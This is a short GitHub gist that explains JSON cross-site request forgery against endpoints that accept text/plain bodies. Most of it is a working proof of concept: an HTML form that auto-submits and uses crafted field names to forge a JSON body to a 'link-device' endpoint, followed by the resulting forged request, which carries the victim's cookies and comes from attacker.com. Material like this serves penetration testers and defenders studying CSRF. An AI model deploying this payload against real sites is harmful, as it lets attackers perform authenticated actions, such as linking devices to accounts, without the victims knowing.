Skip to content

Instantly share code, notes, and snippets.

@Xib3rR4dAr

Xib3rR4dAr/json_csrf.md

Created January 6, 2025 09:27
Show Gist options
  • Save Xib3rR4dAr/44890e0de9a1343290e9530b1e9f7b47 to your computer and use it in GitHub Desktop.
Save Xib3rR4dAr/44890e0de9a1343290e9530b1e9f7b47 to your computer and use it in GitHub Desktop.
Download ZIP
JSON CSRF
Raw
json_csrf.md

CSRF can be done in JSON requests if other mime types like text/plain are supported but data strcture should be of type JSON.

PoC:

<html>
  <body>
    <form action="https://example.com/link-device.php" method="POST" enctype="text/plain">
      <input type="hidden" name='{"code":"BINGOOOOM","foo=' value='":""}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Resulting request will be:

POST /link-device.php HTTP/2
Host: example.com
Cookie: {COOKIES_HERE}
Content-Length: 33
Cache-Control: max-age=0
Origin: http://attacker.com
Content-Type: text/plain
Upgrade-Insecure-Requests: 1
User-Agent: {USER_AGENT_HERE}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://attacker.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

{"code":"BINGOOOOM","foo==":""}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment